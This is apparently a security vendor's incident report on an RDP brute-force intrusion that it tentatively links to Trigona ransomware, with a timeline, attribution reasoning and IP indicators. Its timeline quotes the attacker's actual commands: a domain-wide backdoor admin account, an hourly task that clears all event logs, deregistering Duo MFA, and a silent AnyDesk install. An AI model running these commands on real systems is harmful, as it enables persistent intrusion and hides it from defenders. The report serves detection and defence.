threat-analysis
Possible Trigona Ransomware Appearance
A summary of a possible Trigona ransomware reappearance is analyzed and summarized below through the lens of a unique situation found while DeepSeas was serving one of its clients.
When it was discovered that a web server with RDP access had been brute forced by an actor, the DeepSeas cyber threat intelligence crew believed it may have been trying to deliver and execute Trigona ransomware. The intruder performed many different malicious actions in the client’s environment after gaining initial access, including establishing persistence, escalating privileges, evading defenses, performing asset discovery, conducting lateral movement, data collection, and more. Upon review of the intruder’s activities, DeepSeas noted that some of the tactics, techniques, and procedures (TTPs) matched previously observed TTPs associated with the actor responsible for the Trigona ransomware.
As the attack was halted prior to any ransomware activity, DeepSeas was unable to obtain the intruder’s final payload for analysis, which unfortunately does not permit concrete attribution of this attack to the Trigona ransomware actor. Due to these factors, DeepSeas cannot rule out the possibility that this incident may be a new or different actor simply using Trigona ransomware or copying their tactics. Regardless, DeepSeas is presenting these findings in the hopes that other organizations may find this analysis useful in identifying and blocking further activity by this actor.
About Trigona Ransomware
Trigona ransomware first appeared in June 2022, with the group behind the ransomware simply going by the uninspired moniker “Trigona ransomware group.” The group’s operations were typical of most ransomware group operations – extorting victims indiscriminately, mostly large organizations in the technology, healthcare, finance, manufacturing, and retail sectors. They also cast a wide geographic net, with many victims located in the United States, India, Israel, Turkey, Brazil, and Italy.
After executing their ransomware, the Trigona ransom note required victims to enter a unique key into their website to obtain further instructions. This key was used to access a payment portal hosted on the Tor network, where the group demanded payment in cryptocurrency, specifically Monero (XMR), to obtain the decryption key. The group also hosted an extortion blog on the dark web named Trigona Leaks. This blog was used to publicly display victim data to induce fear in victims, demonstrating that the group had exfiltrated data and driving home the point that the Trigona ransomware group was not a run of the mill criminal group attempting to use previously leaked data to extort victims.
The group was in full operation until October 2023, when user @vx_herm1t on X (formerly Twitter) announced the takedown of their infrastructure, including all their servers and their dark web blog. In addition to this vigilante takedown, the X user also exfiltrated all the group’s data they could obtain, which was likely provided to law enforcement. Researchers observed almost no activity from the Trigona group following this incident, and the group was believed to be completely disabled. The research conducted by DeepSeas also supports this conclusion, finding users in dark web crime forums pointing out as early as July 2023 that Trigona had been taken down. One poster said, “Trigona isn’t working. Therefore, they are not accepting new partners for now.”
Protect Your Organization from Ransomware
Actions on Objective
During the DeepSeas investigation, internal analysts developed a chronological timeline of events to understand the actions on objective undertaken by the intruder. After repeated failed attempts to brute force the password, on July 27, 2024 a successful remote desktop protocol (RDP) connection was made to the client’s web server by an unauthorized user from Germany. On July 28, the attacker then logged on to the brute forced admin account, where they loitered until July 29.
At approximately 0230 UTC on July 29, the attacker began to make their first hands-on moves. Initially, the attacker created a new user account named ITadmin locally by running a file called !newuser.bat. This batch script was then responsible for later misuse of the native Windows program net.exe to establish the ITadmin account both locally and to all domain-joined computers, gaining administrator access to all of the client’s systems connected to that domain. In addition to creating a local user administrative account on the system, this batch script also added the account to the remote desktop users group.
net user ITadmin ZXCzxc123!!! /add
net user ITadmin ZXCzxc123!!! /add /domain
Next, the batch script utilized net.exe to add the ITadmin account to a multitude of different administrator groups in different languages, both locally and for domain-joined devices, which were then activated.
net localgroup Administrators ITadmin /add
net localgroup administradores ITadmin /add
net localgroup Administrateurs ITadmin /add
net localgroup Administratoren ITadmin /add
net localgroup Administrators ITadmin /add /domain
net localgroup administradores ITadmin /add /domain
net localgroup Administrateurs ITadmin /add /domain
net localgroup Administratoren ITadmin /add /domain
net localgroup “Remote Desktop Users” ITadmin /add
net user ITadmin /active:yes
After the successful creation and permission additions made to the ITadmin account, the attacker then erased the registry entry for the account’s creation. This registry change ensured that the newly created account was not displayed on any login screens where it might be detected and raise an alarm.
reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\policies\system” /v dontdisplaylastusername /t REG_DWORD /d 1 /f
The attacker also created a scheduled task to clear all Windows event logs once every hour.
schtasks /create /ru “NT AUTHORITY\SYSTEM” /tn “Events” /tr “c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }” /sc HOURLY /f
Next, the attacker disabled the client’s multi-factor authentication (MFA) service by using the native Windows regsvr32.exe program to deregister the service’s registry entries.
regsvr32 /u “C:\Program Files\Duo Security\WindowsLogon\DuoCredProv.dll”
regsvr32 /u “C:\Program Files\Duo Security\WindowsLogon\DuoCredFilter.dll”
regsvr32 /u “C:\Program Files\Duo Security\DuoCredProv\DuoCredProv.dll”
regsvr32 /u “C:\Program Files\Duo Security\DuoCredProv\DuoCredFilter.dll”
AnyDesk, a well-known remote desktop application, was then installed through a script named any.bat, executed, and a password was set for the new AnyDesk account. Later, external RDP connections were detected using this AnyDesk instance, with the program reaching out to IP addresses in the United States, Russia, and Bulgaria.
“””C:\Windows\System32\cmd.exe”” /C “”C:\Users\ITadmin\Desktop\Any.bat”” “
any.exe –install c:\windows\anydesk –start-with-win –silent –update-disabled
c:\windows\anydesk\anydesk.exe –start-service
C:\Windows\system32\cmd.exe /S /D /c” echo ZAZA123!@# “
c:\windows\anydesk\anydesk.exe –set-password
Following these actions, a suite of malicious tools was then imported and installed in a new folder named “C:\temp\net_scan_new_noPS\.” Numerous files were dropped inside this folder, with many of them never being invoked by the attacker, suggesting that the attacker simply imported a preestablished set of tools to use in follow-on activity. A list of these files is below.
- c:\temp\net_scan_new_nops\libsmb2.dll
- c:\temp\net_scan_new_nops\libsmi2.dll
- c:\temp\net_scan_new_nops\netscan.exe
- c:\temp\net_scan_new_nops\netscan.lic
- c:\temp\net_scan_new_nops\netscan.xml
- c:\temp\net_scan_new_nops\opt
- c:\temp\net_scan_new_nops\opt\openrdp.bat
- c:\temp\net_scan_new_nops\opt\psexec.exe
- c:\temp\net_scan_new_nops\opt\shutdown.bat
- c:\temp\net_scan_new_nops\opt\vm_off.bat
- c:\temp\net_scan_new_nops\oui.txt
- c:\temp\net_scan_new_nops\opt\psexec.exe
Then, using the uploaded network scanner running out of the “C:\temp\net_scan_new_noPS” directory, the client’s entire network infrastructure was mapped for discovery purposes, likely to continue pivoting through the client’s environment. This was the final activity seen in this attack, with further actions being blocked and the attack terminated after 0139 AM UTC on July 30, 2024.
Observed Tactics Hint at Trigona Ransomware Link
In the context of the above activity, DeepSeas analysts noticed several overlaps between the actions taken in this incident and previous Trigona ransomware activity. This activity includes the use of the SoftPerfect Network Scanner tool listed as netscan.exe in the above traffic, the openrdp.bat tool also known as the “Remote Desktop Plus” RDP client, and newuser.bat, which in both this case and previous Trigona ransomware cases was used to retrieve the Local Administrators Group and Remote Desktop Users group names via WMIC. All of these matching TTPs were observed in a 2023 DIFR report, along with other other commonalities such as the threat actor gaining initial access through an exposed RDP server, use of similar discovery tools, and more.
Protect Your Organization from Ransomware
The number of coincidences between previously observed Trigona ransomware actor activity and the activity observed by DeepSeas is sufficient to suggest that the individual or team responsible for previous Trigona ransomware activity has either resumed operations or, that following the compromise of their infrastructure in 2023, the group sold their ransomware, toolset, and playbooks to another actor. DeepSeas analysts view the former as the more likely option. Even in cases where a group shuts down and sells their operation, the new operators often change the malware, tools, and tactics to suit their own workflows. DeepSeas analysts cannot rule out the possibility of an independent actor copying Trigona tactics, however, the actions on objective, sequence, and timing of these actions, while slower than previously observed Trigona incidents, is suggestive of the group’s involvement in some form.
Fortunately, the attackers never got the chance to deliver a final payload or exfiltrate data, as the attack was detected and stopped before the attackers could do any damage. The Trigona ransomware group and many other ransomware groups often do not deliver the ransomware binary before laying the groundwork and clearing the way for the cryptor to execute freely. As the attack was stopped before this point, it is impossible to conclude with 100% certainty that the Trigona ransomware actors were responsible for this intrusion, though DeepSeas analysts conclude that Trigona’s tactics are the best fit for the observed activity.
DeepSeas Response and Indicators of Compromise
This attack was detected and blocked by DeepSeas MDR before any data loss or encryption could occur. Upon detection, DeepSeas analysts were in close contact with the client, who helpfully provided context and other information that was critical to a quick resolution. The attacker’s access was cut off, passwords were rotated, and multifactor authentication keys were rotated to ensure that the attacker no longer had any access to the client’s environment. Uniquely, the client’s Administrator credentials had been placed on an hourly rotation, and this is likely what led to the attackers establishing their own administrator account, complicating their operations and slowing them down. Previous Trigona ransomware incidents have taken approximately 2.5 hours from compromise to ransomware execution. If indeed this incident was the work of Trigona resurgent, they found this client a difficult nut to crack and ultimately wasted two to three days of operational time for no monetary gain.
The following indicator(s) of compromise (IOC) are related to this incident. Threat hunters should search the following IPv4 address in network and Windows event logs to ensure that RDP brute forcing and use of remote desktop software is not present in their environments.
Type | Value | Notes |
IPv4 Address | 88.214.25[.]19 | IPv4 address utilized by the presumed Trigona ransomware actors to conduct brute force attacks against RDP. |
IPv4 Address | 85.215.192[.]231 | IPv4 address utilized by the presumed Trigona ransomware actors after successfully brute-forcing RDP access. |
Possible Trigona Ransomware Conclusion
The activity in this report is suggestive that, despite the reported decline of the Trigona ransomware group, it is possible that the group, or some elements of the group, continue to persist. The available evidence hints at the Trigona ransomware group’s involvement, but no conclusive proof is available at this time due to the attack being stopped before further actions could be undertaken. DeepSeas analysts believe that, whether or not the attack was carried out by this group, a successfully blocked attack is infinitely preferable to whatever intelligence might be gained from permitting an attacker to operate freely.
Whether the Trigona group has begun to make a reappearance or another group or individual is attempting to capitalize on the work they left behind, it is always important to continue to monitor and protect against threats of ransomware, despite the age of the ransomware or group in question. If not for the quick actions by DeepSeas security analysts against this threat, an organization may have been ransomed. We invite you to follow and support DeepSeas as we continue to publish our findings for the cybersecurity community.